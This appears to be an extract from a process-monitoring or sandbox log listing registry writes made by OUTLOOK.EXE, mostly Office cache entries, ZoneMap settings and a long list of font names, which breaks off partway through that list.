4600000092000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap

UNCAsIntranet

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap

AutoDetect

2428

OUTLOOK.EXE

write

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage

WORDFiles

1332215871

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Identities

Identity Ordinal

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\98D2D5BCF7B8734F9FD8C65A80C8688A

WriterId

4744375

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\98D2D5BCF7B8734F9FD8C65A80C8688A

LastModification

D0BEC2805A48D401

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\98D2D5BCF7B8734F9FD8C65A80C8688A

MsgEID

00000000EE353A6753D116479D0919B95E8B889A88001000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\0a0d020000000000c000000000000046

00030487

0C6F210D

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\327CDEF1D04DC14CAE2C2A52690EA62B

WriterId

4744390

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\327CDEF1D04DC14CAE2C2A52690EA62B

LastModification

D02FC5805A48D401

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\327CDEF1D04DC14CAE2C2A52690EA62B

MsgEID

00000000EE353A6753D116479D0919B95E8B889AA8001000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\FFE18E6B2B43CB4E88C022C5AA06761C

WriterId

4744390

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\FFE18E6B2B43CB4E88C022C5AA06761C

LastModification

D02FC5805A48D401

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\FFE18E6B2B43CB4E88C022C5AA06761C

MsgEID

00000000EE353A6753D116479D0919B95E8B889AC8001000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\DF4138405E3AA34B96C303CE20B3547E

WriterId

4744390

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\DF4138405E3AA34B96C303CE20B3547E

LastModification

D02FC5805A48D401

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\DF4138405E3AA34B96C303CE20B3547E

MsgEID

00000000EE353A6753D116479D0919B95E8B889AE8001000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\48D2759808563A44AAFE636682B8D65C

WriterId

4744390

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\48D2759808563A44AAFE636682B8D65C

LastModification

D02FC5805A48D401

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\48D2759808563A44AAFE636682B8D65C

MsgEID

00000000EE353A6753D116479D0919B95E8B889A08011000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\F3B30A7E1B549D45B7A93F89E341E320

WriterId

4744390

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\F3B30A7E1B549D45B7A93F89E341E320

LastModification

D02FC5805A48D401

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\F3B30A7E1B549D45B7A93F89E341E320

MsgEID

00000000EE353A6753D116479D0919B95E8B889A28011000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\04BAEC931EB4424C93F2906233933532

WriterId

4744390

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\04BAEC931EB4424C93F2906233933532

LastModification

D02FC5805A48D401

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Perf\RoamingStreamsCache\04BAEC931EB4424C93F2906233933532

MsgEID

00000000EE353A6753D116479D0919B95E8B889A48011000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\3517490d76624c419a828607e2a54604

001f6000

4E006F004D00610069006C000000

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Ami R

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Arial Unicode MS

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Batang

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@BatangChe

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@DFKai-SB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Dotum

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@DotumChe

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Expo M

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@FangSong

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Gulim

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@GulimChe

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Gungsuh

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@GungsuhChe

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Headline R

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGGothicE

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGGothicM

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGGyoshotai

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGKyokashotai

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGMaruGothicMPRO

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGMinchoB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGMinchoE

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGPGothicE

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGPGothicM

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGPGyoshotai

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGPKyokashotai

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGPMinchoB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGPMinchoE

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGPSoeiKakugothicUB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGPSoeiKakupoptai

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGPSoeiPresenceEB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSeikaishotaiPRO

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSGothicE

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSGothicM

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSGyoshotai

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSKyokashotai

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSMinchoB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSMinchoE

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSoeiKakugothicUB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSoeiKakupoptai

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSoeiPresenceEB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSSoeiKakugothicUB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSSoeiKakupoptai

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HGSSoeiPresenceEB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYGothic-Extra

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYGothic-Medium

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYGraphic-Medium

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYGungSo-Bold

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYHeadLine-Medium

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYMyeongJo-Extra

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYPMokGak-Bold

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYPost-Light

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYPost-Medium

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYShortSamul-Medium

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@HYSinMyeongJo-Medium

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@KaiTi

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Magic R

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Malgun Gothic

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Meiryo

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Meiryo UI

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Microsoft JhengHei

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Microsoft YaHei

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@MingLiU

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@MingLiU_HKSCS

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@MingLiU_HKSCS-ExtB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@MingLiU-ExtB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@MoeumT R

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@MS Gothic

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@MS Mincho

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@MS PGothic

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@MS PMincho

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@MS UI Gothic

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@New Gulim

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@NSimSun

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@PMingLiU

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@PMingLiU-ExtB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Pyunji R

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@SimHei

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@SimSun

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@SimSun-ExtB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

@Yet R

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Agency FB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Aharoni

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Algerian

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Ami R

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Andalus

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Angsana New

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

AngsanaUPC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Aparajita

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Arabic Typesetting

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Arial

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Arial Black

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Arial Narrow

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Arial Rounded MT Bold

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Arial Unicode MS

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Baskerville Old Face

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Batang

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

BatangChe

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Bauhaus 93

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Bell MT

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Berlin Sans FB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Berlin Sans FB Demi

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Bernard MT Condensed

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Blackadder ITC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Bodoni MT

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Bodoni MT Black

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Bodoni MT Condensed

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Bodoni MT Poster Compressed

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Book Antiqua

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Bookman Old Style

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Bookshelf Symbol 7

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Bradley Hand ITC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Britannic Bold

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Broadway

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Browallia New

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

BrowalliaUPC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Brush Script MT

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Calibri

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Californian FB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Calisto MT

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Cambria

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Cambria Math

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Candara

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Castellar

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Centaur

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Century

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Century Gothic

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Century Schoolbook

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Chiller

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Colonna MT

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Comic Sans MS

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Consolas

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Constantia

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Cooper Black

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Copperplate Gothic Bold

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Copperplate Gothic Light

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Corbel

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Cordia New

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

CordiaUPC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Courier

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Courier New

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Curlz MT

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

DaunPenh

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

David

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

DFKai-SB

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

DilleniaUPC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

DokChampa

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Dotum

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

DotumChe

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Ebrima

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Edwardian Script ITC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Elephant

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Engravers MT

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Eras Bold ITC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Eras Demi ITC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Eras Light ITC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Eras Medium ITC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Estrangelo Edessa

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

EucrosiaUPC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Euphemia

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Expo M

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

FangSong

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Felix Titling

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Fixedsys

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Footlight MT Light

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Forte

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Franklin Gothic Book

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Franklin Gothic Demi

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Franklin Gothic Demi Cond

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Franklin Gothic Heavy

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Franklin Gothic Medium

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Franklin Gothic Medium Cond

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

FrankRuehl

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

FreesiaUPC

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Freestyle Script

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

French Script MT

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gabriola

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Garamond

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gautami

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Georgia

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gigi

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gill Sans MT

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gill Sans MT Condensed

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gill Sans MT Ext Condensed Bold

2428

OUTLOOK.EXE

write

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts

Gill Sans Ultra Bold

2428

